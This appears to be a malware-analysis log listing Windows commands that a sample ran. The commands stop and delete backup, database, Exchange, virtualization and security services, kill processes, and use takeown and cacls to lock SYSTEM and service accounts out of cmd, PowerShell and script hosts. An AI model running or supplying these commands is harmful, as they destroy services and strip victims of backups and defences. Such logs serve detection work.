  • '<SYSTEM32>\sc.exe' delete "Daemon Service"
  • '<SYSTEM32>\sc.exe' delete U8EISService
  • '<SYSTEM32>\sc.exe' delete "Nuo Update Monitor"
  • '<SYSTEM32>\sc.exe' delete U8DispatchService
  • '<SYSTEM32>\net1.exe' stop OMAILREPORT
  • '<SYSTEM32>\sc.exe' delete RtcSrv
  • '<SYSTEM32>\net1.exe' stop SentinelKeysServer
  • '<SYSTEM32>\net1.exe' stop CASMsgSrv
  • '<SYSTEM32>\sc.exe' delete UFAllNet
  • '<SYSTEM32>\net1.exe' stop UFAllNet
  • '<SYSTEM32>\net1.exe' stop U8WebPool
  • '<SYSTEM32>\net1.exe' stop U8TaskService
  • '<SYSTEM32>\net1.exe' stop U8SLReportService
  • '<SYSTEM32>\net1.exe' stop U8SCMPool
  • '<SYSTEM32>\net1.exe' stop U8MPool
  • '<SYSTEM32>\net1.exe' stop U8KeyManagePool
  • '<SYSTEM32>\net1.exe' stop U8GCService
  • '<SYSTEM32>\net1.exe' stop U8EncryptService
  • '<SYSTEM32>\net1.exe' stop U8EISService
  • '<SYSTEM32>\net1.exe' stop NFOTPService
  • '<SYSTEM32>\net1.exe' stop U8DispatchService
  • '<SYSTEM32>\net1.exe' stop NFSysService
  • '<SYSTEM32>\net1.exe' stop TurboCRM70
  • '<SYSTEM32>\net1.exe' stop "NetVault Process Manager"
  • '<SYSTEM32>\net1.exe' stop DGPNPSEV
  • '<SYSTEM32>\net1.exe' stop "ABBYY.Licensing.FineReader.Professional.12.0"
  • '<SYSTEM32>\net1.exe' stop AgentX
  • '<SYSTEM32>\net1.exe' stop "Apple Mobile Device Service"
  • '<SYSTEM32>\net1.exe' stop Mysoft.SchedulingService
  • '<SYSTEM32>\net1.exe' stop "Bonjour Service"
  • '<SYSTEM32>\net1.exe' stop GNWebService
  • '<SYSTEM32>\sc.exe' delete "U8WorkerService1"
  • '<SYSTEM32>\net1.exe' stop U8SendMailAdmin
  • '<SYSTEM32>\net1.exe' stop CobianBackup10
  • '<SYSTEM32>\sc.exe' delete UTUService
  • '<SYSTEM32>\sc.exe' delete UFReportService
  • '<SYSTEM32>\net1.exe' stop pcas
  • '<SYSTEM32>\net1.exe' stop RTCAVMCU
  • '<SYSTEM32>\sc.exe' delete MSCRMAsyncService$maintenance
  • '<SYSTEM32>\sc.exe' delete "U8WebPool"
  • '<SYSTEM32>\sc.exe' delete VmAgentDaemon
  • '<SYSTEM32>\sc.exe' delete OpenFastAssist
  • '<SYSTEM32>\net1.exe' stop MSExchangeThrottling
  • '<SYSTEM32>\net1.exe' stop TPlusStdTaskService1220
  • '<SYSTEM32>\net1.exe' stop ServiceMid
  • '<SYSTEM32>\sc.exe' delete BackupExecJobEngine
  • '<SYSTEM32>\sc.exe' delete ShareBoxMonitorService
  • '<SYSTEM32>\net1.exe' stop MSExchangeSubmission
  • '<SYSTEM32>\sc.exe' delete BackupExecAgentBrowser
  • '<SYSTEM32>\sc.exe' delete savsvc
  • '<SYSTEM32>\net1.exe' stop TPlusStdAppService1220
  • '<SYSTEM32>\net1.exe' stop tmlisten
  • '<SYSTEM32>\net1.exe' stop MSExchangeServiceHost
  • '<SYSTEM32>\sc.exe' delete BackupExecRPCService
  • '<SYSTEM32>\sc.exe' delete abs_deployer
  • '<SYSTEM32>\net1.exe' stop MySQL
  • '<SYSTEM32>\net1.exe' stop VeeamDistributionSvc
  • '<SYSTEM32>\sc.exe' delete ShareBoxService
  • '<SYSTEM32>\sc.exe' delete BackupExecDeviceMediaService
  • '<SYSTEM32>\net1.exe' stop MSExchangeRPC
  • '<SYSTEM32>\sc.exe' delete bedbg
  • '<SYSTEM32>\sc.exe' delete MysoftUpdate
  • '<SYSTEM32>\net1.exe' stop OracleDBConsoleilas
  • '<SYSTEM32>\net1.exe' stop VeeamBrokerSvc
  • '<SYSTEM32>\net1.exe' stop MSExchangeRepl
  • '<SYSTEM32>\sc.exe' delete BackupExecAgentAccelerator
  • '<SYSTEM32>\sc.exe' delete Mysoft.Setup.InstallService
  • '<SYSTEM32>\net1.exe' stop "OracleOraDb10g_homeliSQL*Plus"
  • '<SYSTEM32>\net1.exe' stop VeeamMountSvc
  • '<SYSTEM32>\sc.exe' delete "Zabbix Agent"
  • '<SYSTEM32>\sc.exe' delete Mysoft.SchedulingService
  • '<SYSTEM32>\net1.exe' stop MSExchangePOP3BE
  • '<SYSTEM32>\sc.exe' delete GPSFtpd
  • '<SYSTEM32>\sc.exe' delete edr_monitor
  • '<SYSTEM32>\net1.exe' stop VeeamCloudSvc
  • '<SYSTEM32>\net1.exe' stop AutoUpdatePatchService
  • '<SYSTEM32>\net1.exe' stop 360EntPGSvc
  • '<SYSTEM32>\net1.exe' stop NFLicenceServer
  • '<SYSTEM32>\sc.exe' delete "Rpc Monitor"
  • '<SYSTEM32>\sc.exe' delete OfficeClearCache
  • '<SYSTEM32>\net1.exe' stop MySQL5_OA
  • '<SYSTEM32>\sc.exe' delete "EasyFZS Server"
  • '<SYSTEM32>\sc.exe' delete U8SmsSrv
  • '<SYSTEM32>\net1.exe' stop ImtsEventSvr
  • '<SYSTEM32>\net1.exe' stop d_safe
  • '<SYSTEM32>\net1.exe' stop MSExchangeUMCR
  • '<SYSTEM32>\sc.exe' delete Serv-U
  • '<SYSTEM32>\net1.exe' stop DDVRulesProcessor
  • '<SYSTEM32>\net1.exe' stop AngelOfDeath
  • '<SYSTEM32>\sc.exe' delete YunService
  • '<SYSTEM32>\sc.exe' delete KICkSvr
  • '<SYSTEM32>\sc.exe' delete TurboCRM70
  • '<SYSTEM32>\net1.exe' stop MSExchangeUM
  • '<SYSTEM32>\sc.exe' delete EASService
  • '<SYSTEM32>\net1.exe' stop "FileZilla Server"
  • '<SYSTEM32>\net1.exe' stop RavTask
  • '<SYSTEM32>\net1.exe' stop MSExchangeTransportLogSearch
  • '<SYSTEM32>\sc.exe' delete Gailun_Downloader
  • '<SYSTEM32>\sc.exe' delete CIS
  • '<SYSTEM32>\net1.exe' stop K3MobileServiceManage
  • '<SYSTEM32>\net1.exe' stop ClickToRunSvc
  • '<SYSTEM32>\sc.exe' delete TxQBService
  • '<SYSTEM32>\sc.exe' delete "U8WorkerService2"
  • '<SYSTEM32>\net1.exe' stop MSExchangeTransport
  • '<SYSTEM32>\sc.exe' delete MDM
  • '<SYSTEM32>\sc.exe' delete CloudExchangeService
  • '<SYSTEM32>\net1.exe' stop TPlusStdUpgradeService1220
  • '<SYSTEM32>\sc.exe' delete BackupExecManagementService
  • '<SYSTEM32>\sc.exe' delete MSCRMUnzipService
  • '<SYSTEM32>\net1.exe' stop VMnetDHCP
  • '<SYSTEM32>\net1.exe' stop wanxiao-monitor
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\wscript.exe /e /d mssqlserver
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\wscript.exe /e /d SERVICE
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\wscript.exe /e /g Administrators:r
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\wscript.exe /e /g Users:r
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\wscript.exe /g Administrators:f
  • '<SYSTEM32>\takeown.exe' /f <SYSTEM32>\wscript.exe /a
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\FTP.exe /e /d mssql$sqlexpress
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\FTP.exe /e /d system
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\FTP.exe /e /d "network service"
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\FTP.exe /e /d mssqlserver
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\FTP.exe /e /d SERVICE
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\FTP.exe /e /g Administrators:r
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\FTP.exe /e /g Users:r
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\FTP.exe /g Administrators:f
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\wscript.exe /e /d "network service"
  • '<SYSTEM32>\takeown.exe' /f %WINDIR%\SysWOW64\FTP.exe /a
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\FTP.exe /e /d system
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\FTP.exe /e /d "network service"
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\FTP.exe /e /d mssqlserver
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\FTP.exe /e /d SERVICE
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\FTP.exe /e /g Administrators:r
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\FTP.exe /e /g Users:r
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\FTP.exe /g Administrators:f
  • '<SYSTEM32>\takeown.exe' /f <SYSTEM32>\FTP.exe /a
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\mshta.exe /e /d mssql$sqlexpress
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\mshta.exe /e /d system
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\mshta.exe /e /d "network service"
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\mshta.exe /e /d mssqlserver
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\mshta.exe /e /d SERVICE
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\mshta.exe /e /g Administrators:r
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\FTP.exe /e /d mssql$sqlexpress
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\cscript.exe /e /d "network service"
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
  • '<SYSTEM32>\takeown.exe' /f %WINDIR%\SysWOW64\wscript.exe /a
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
  • '<SYSTEM32>\takeown.exe' /f <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe /a
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\cscript.exe /e /d mssql$sqlexpress
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\cscript.exe /e /d system
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\cscript.exe /e /d "network service"
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\cscript.exe /e /d mssqlserver
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\cscript.exe /e /d SERVICE
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\cscript.exe /e /g Administrators:r
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\cscript.exe /e /g Users:r
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\cscript.exe /g Administrators:f
  • '<SYSTEM32>\takeown.exe' /f %WINDIR%\SysWOW64\cscript.exe /a
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\cscript.exe /e /d mssql$sqlexpress
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\mshta.exe /e /g Users:r
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\cscript.exe /e /d system
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\cscript.exe /e /d mssqlserver
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\cscript.exe /e /d SERVICE
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\cscript.exe /e /g Administrators:r
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\cscript.exe /e /g Users:r
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\cscript.exe /g Administrators:f
  • '<SYSTEM32>\takeown.exe' /f <SYSTEM32>\cscript.exe /a
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\wscript.exe /e /d mssql$sqlexpress
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\wscript.exe /e /d system
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\wscript.exe /e /d "network service"
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\wscript.exe /e /d mssqlserver
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\wscript.exe /e /d SERVICE
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\wscript.exe /e /g Administrators:r
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\wscript.exe /e /g Users:r
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\wscript.exe /g Administrators:f
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\wscript.exe /e /d system
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\wscript.exe /e /d mssql$sqlexpress
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\mshta.exe /g Administrators:f
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\net.exe /e /g Administrators:r
  • '<SYSTEM32>\takeown.exe' /f %WINDIR%\SysWOW64\net.exe /a
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\net.exe /e /d mssql$sqlexpress
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\net.exe /e /d system
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\net.exe /e /d "network service"
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\net.exe /e /d mssqlserver
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\net.exe /e /d SERVICE
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\net.exe /e /g Administrators:r
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\net.exe /e /g Users:r
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\net.exe /g Administrators:f
  • '<SYSTEM32>\takeown.exe' /f <SYSTEM32>\net.exe /a
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\cmd.exe /e /d mssql$sqlexpress
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\cmd.exe /e /g system:r
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\cmd.exe /e /d "network service"
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\cmd.exe /e /d mssqlserver
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\net.exe /g Administrators:f
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\cmd.exe /e /d SERVICE
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\cmd.exe /e /g Users:r
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\cmd.exe /g Administrators:f
  • '<SYSTEM32>\takeown.exe' /f %WINDIR%\SysWOW64\cmd.exe /a
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\cmd.exe /e /d mssql$sqlexpress
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\cmd.exe /e /g system:r
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\cmd.exe /e /d "network service"
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\cmd.exe /e /d mssqlserver
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\cmd.exe /e /d SERVICE
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\cmd.exe /e /g Administrators:r
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\cmd.exe /e /g Users:r
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\cmd.exe /g Administrators:f
  • '<SYSTEM32>\cmd.exe' /S /D /c" echo y"
  • '<SYSTEM32>\takeown.exe' /f <SYSTEM32>\cmd.exe /a
  • '<SYSTEM32>\reg.exe' delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v "AutoRun" /f
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\cmd.exe /e /g Administrators:r
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\net1.exe /g Administrators:f
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\mshta.exe /e /d mssql$sqlexpress
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\net.exe /e /d SERVICE
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\mshta.exe /e /d system
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\mshta.exe /e /d "network service"
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\mshta.exe /e /d mssqlserver
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\mshta.exe /e /d SERVICE
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\mshta.exe /e /g Administrators:r
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\mshta.exe /e /g Users:r
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\mshta.exe /g Administrators:f
  • '<SYSTEM32>\takeown.exe' /f <SYSTEM32>\mshta.exe /a
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\net1.exe /e /d mssql$sqlexpress
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\net1.exe /e /d system
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\net1.exe /e /d "network service"
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\net1.exe /e /d mssqlserver
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\net1.exe /e /d SERVICE
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\net1.exe /e /g Administrators:r
  • '<SYSTEM32>\takeown.exe' /f %WINDIR%\SysWOW64\mshta.exe /a
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\net1.exe /e /g Users:r
  • '<SYSTEM32>\takeown.exe' /f %WINDIR%\SysWOW64\net1.exe /a
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\net1.exe /e /d mssql$sqlexpress
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\net1.exe /e /d system
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\net1.exe /e /d "network service"
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\net1.exe /e /d mssqlserver
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\net1.exe /e /d SERVICE
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\net1.exe /e /g Administrators:r
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\net1.exe /e /g Users:r
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\net1.exe /g Administrators:f
  • '<SYSTEM32>\takeown.exe' /f <SYSTEM32>\net1.exe /a
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\net.exe /e /d mssql$sqlexpress
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\net.exe /e /d system
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\net.exe /e /d "network service"
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\net.exe /e /d mssqlserver
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\net.exe /e /g Users:r
  • '<SYSTEM32>\net1.exe' stop UIODetect
  • '<SYSTEM32>\sc.exe' delete ZTEVdservice
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe /e /d system
  • '<SYSTEM32>\sc.exe' delete "ZTE USBIP Client"
  • '<SYSTEM32>\sc.exe' delete VMTools
  • '<SYSTEM32>\sc.exe' delete UIODetect
  • '<SYSTEM32>\net1.exe' stop XenSvc
  • '<SYSTEM32>\net1.exe' stop UFIDAWebService
  • '<SYSTEM32>\net1.exe' stop VMAuthdService
  • '<SYSTEM32>\sc.exe' delete ImeDictUpdateService
  • '<SYSTEM32>\sc.exe' delete RTCDATAMCU
  • '<SYSTEM32>\sc.exe' delete "ZTE USBIP Client Guard"
  • '<SYSTEM32>\sc.exe' delete MSSQLServerOLAPService
  • '<SYSTEM32>\sc.exe' delete WebAttendServer
  • '<SYSTEM32>\sc.exe' delete JhTask
  • '<SYSTEM32>\sc.exe' delete RTCIMMCU
  • '<SYSTEM32>\sc.exe' delete ftusbrdsrv
  • '<SYSTEM32>\sc.exe' delete RTCCDR
  • '<SYSTEM32>\sc.exe' delete QcSoftService
  • '<SYSTEM32>\net1.exe' stop Apache2.4
  • '<SYSTEM32>\sc.exe' delete TCPIDDAService
  • '<SYSTEM32>\net1.exe' stop VMUSBArbService
  • '<SYSTEM32>\sc.exe' delete RTCMEETINGMCU
  • '<SYSTEM32>\sc.exe' delete ftusbrdwks
  • '<SYSTEM32>\sc.exe' delete MSSQLSERVER
  • '<SYSTEM32>\sc.exe' delete K3MobileService
  • '<SYSTEM32>\net1.exe' stop Realtek11nSU
  • '<SYSTEM32>\net1.exe' stop "memcached Server"
  • '<SYSTEM32>\sc.exe' delete MSSQLFDLauncher
  • '<SYSTEM32>\sc.exe' delete aspnet_state @sc delete Redis
  • '<SYSTEM32>\sc.exe' delete "UtilDev Web Server Pro"
  • '<SYSTEM32>\net1.exe' stop TeamViewer8
  • '<SYSTEM32>\sc.exe' delete RtcQms
  • '<SYSTEM32>\net1.exe' stop xenlite
  • '<SYSTEM32>\sc.exe' delete TeamViewer
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
  • '<SYSTEM32>\sc.exe' delete "wanxiao-monitor"
  • '<SYSTEM32>\sc.exe' delete SPTimerV4
  • '<SYSTEM32>\sc.exe' delete "Kiwi Syslog Server"
  • '<SYSTEM32>\sc.exe' delete RabbitMQ
  • '<SYSTEM32>\sc.exe' delete "vm-agent"
  • '<SYSTEM32>\net1.exe' stop MSExchangeAntispamUpdate
  • '<SYSTEM32>\sc.exe' delete AlibabaProtect
  • '<SYSTEM32>\sc.exe' delete SPSearchHostController
  • '<SYSTEM32>\sc.exe' delete "Flash Helper Service"
  • '<SYSTEM32>\sc.exe' delete ReportServer
  • '<SYSTEM32>\net1.exe' stop mysqltransport
  • '<SYSTEM32>\net1.exe' stop DellDRLogSvc
  • '<SYSTEM32>\sc.exe' delete VMwareHostd
  • '<SYSTEM32>\sc.exe' delete qemu-ga
  • '<SYSTEM32>\sc.exe' delete SPAdminV4
  • '<SYSTEM32>\sc.exe' delete UI0Detect
  • '<SYSTEM32>\sc.exe' delete allpass_redisservice_port21160
  • '<SYSTEM32>\sc.exe' delete VMUSBArbService
  • '<SYSTEM32>\net1.exe' stop "Synology Drive VSS Service x64"
  • '<SYSTEM32>\net1.exe' stop MSExchangeADTopology
  • '<SYSTEM32>\net1.exe' stop WebAttendServer
  • '<SYSTEM32>\sc.exe' delete ProjectQueueService16
  • '<SYSTEM32>\sc.exe' delete wwbizsrv
  • '<SYSTEM32>\sc.exe' delete MSDTC
  • '<SYSTEM32>\sc.exe' delete VMAuthdService
  • '<SYSTEM32>\sc.exe' delete MCService
  • '<SYSTEM32>\sc.exe' delete ProjectEventService16
  • '<SYSTEM32>\sc.exe' delete "ZTE FileTranS"
  • '<SYSTEM32>\sc.exe' delete VGAuthService
  • '<SYSTEM32>\net1.exe' stop Apache2.2
  • '<SYSTEM32>\net1.exe' stop MSComplianceAudit
  • '<SYSTEM32>\sc.exe' delete XT800Service_Personal
  • '<SYSTEM32>\net1.exe' stop FirebirdGuardianDeafaultInstance
  • '<SYSTEM32>\sc.exe' delete SQLBrowser
  • '<SYSTEM32>\cmd.exe' /c "@color b & sc delete MSCRMAsyncService & @sc delete REPLICA & @sc delete RTCATS & @sc delete RTCAVMCU & @sc delete RtcQms & @sc delete RTCMEETINGMCU & @sc delete RTCIMMCU & @sc delete RTCDA...
  • '<SYSTEM32>\cmd.exe' /c "color b & @sc delete "DAService_TCP" & @sc delete "eCard-TTransServer" & @sc delete eCardMPService & @sc delete EnergyDataService & @sc delete UI0Detect & @sc delete K3MobileService & @sc d...
  • '<SYSTEM32>\cmd.exe' /c "color b & @sc delete "XT800Service_Personal" & @sc delete SQLSERVERAGENT & @sc delete SQLWriter & @sc delete SQLBrowser & @sc delete MSSQLFDLauncher & @sc delete MSSQLSERVER & @sc delete Qc...
  • '<SYSTEM32>\cacls.exe' C:\Users\Public /e /d mssql$sqlexpress
  • '<SYSTEM32>\cacls.exe' C:\Users\Public /e /d system
  • '<SYSTEM32>\cacls.exe' C:\Users\Public /e /d "network service"
  • '<SYSTEM32>\cacls.exe' C:\Users\Public /e /d mssqlserver
  • '<SYSTEM32>\cacls.exe' C:\Users\Public /e /d SERVICE
  • '<SYSTEM32>\cacls.exe' C:\Users\Public /e /g Administrators:r
  • '<SYSTEM32>\cacls.exe' C:\Users\Public /e /g Users:r
  • '<SYSTEM32>\cacls.exe' C:\Users\Public /g Administrators:f
  • '<SYSTEM32>\takeown.exe' /f C:\Users\Public /a
  • '<SYSTEM32>\cacls.exe' %ALLUSERSPROFILE% /e /d mssql$sqlexpress
  • '<SYSTEM32>\cacls.exe' %ALLUSERSPROFILE% /e /d system
  • '<SYSTEM32>\cacls.exe' %ALLUSERSPROFILE% /e /d "network service"
  • '<SYSTEM32>\cmd.exe' /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc ...
  • '<SYSTEM32>\cacls.exe' %ALLUSERSPROFILE% /e /d mssqlserver
  • '<SYSTEM32>\cacls.exe' %ALLUSERSPROFILE% /e /g Administrators:r
  • '<SYSTEM32>\cacls.exe' %ALLUSERSPROFILE% /e /g Users:r
  • '<SYSTEM32>\cacls.exe' %ALLUSERSPROFILE% /g Administrators:f
  • '<SYSTEM32>\takeown.exe' /f %ALLUSERSPROFILE% /a
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
  • '<SYSTEM32>\takeown.exe' /f %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress
  • '<SYSTEM32>\cacls.exe' %ALLUSERSPROFILE% /e /d SERVICE
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver
  • '<SYSTEM32>\sc.exe' delete FxService
  • '<SYSTEM32>\cmd.exe' /c "color a & @net stop U8WorkerService1 & @net stop U8WorkerService2 & @net stop "memcached Server" & @net stop Apache2.4 & @net stop UFIDAWebService & @net stop MSComplianceAudit & @net stop ...
  • '<SYSTEM32>\net1.exe' stop "igfxCUIService2.0.0.0"
  • '<SYSTEM32>\net1.exe' stop U8WorkerService2
  • '<SYSTEM32>\sc.exe' delete RTCAVMCU
  • '<SYSTEM32>\sc.exe' delete EnergyDataService
  • '<SYSTEM32>\net1.exe' stop VMwareHostd
  • '<SYSTEM32>\sc.exe' delete SQLWriter
  • '<SYSTEM32>\sc.exe' delete OracleVssWriterORCL
  • '<SYSTEM32>\sc.exe' delete ftnlses3
  • '<SYSTEM32>\sc.exe' delete RTCATS
  • '<SYSTEM32>\sc.exe' delete eCardMPService
  • '<SYSTEM32>\sc.exe' delete SQLSERVERAGENT
  • '<SYSTEM32>\sc.exe' delete OracleOraDb11g_home1TNSListener
  • '<SYSTEM32>\sc.exe' delete ftnlsv3
  • '<SYSTEM32>\sc.exe' delete REPLICA
  • '<SYSTEM32>\sc.exe' delete OracleServiceORCL
  • '<SYSTEM32>\sc.exe' delete "eCard-TTransServer"
  • '<SYSTEM32>\net1.exe' stop HaoZipSvc
  • '<SYSTEM32>\net1.exe' stop U8WorkerService1
  • '<SYSTEM32>\sc.exe' delete MSCRMAsyncService
  • '<SYSTEM32>\sc.exe' delete "UWS LoPriv Services"
  • '<SYSTEM32>\sc.exe' delete OracleOraDb11g_home1ClrAgent
  • '<SYSTEM32>\sc.exe' delete "XT800Service_Personal"
  • '<SYSTEM32>\sc.exe' delete "DAService_TCP"
  • '<SYSTEM32>\cmd.exe' /c "color e & @taskkill /IM VBoxSDS.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM TeamViewer_Service.exe /F & @taskkill /IM TeamViewer.exe /F & @taskkill /IM CasLicenceServer.exe /F & @t...
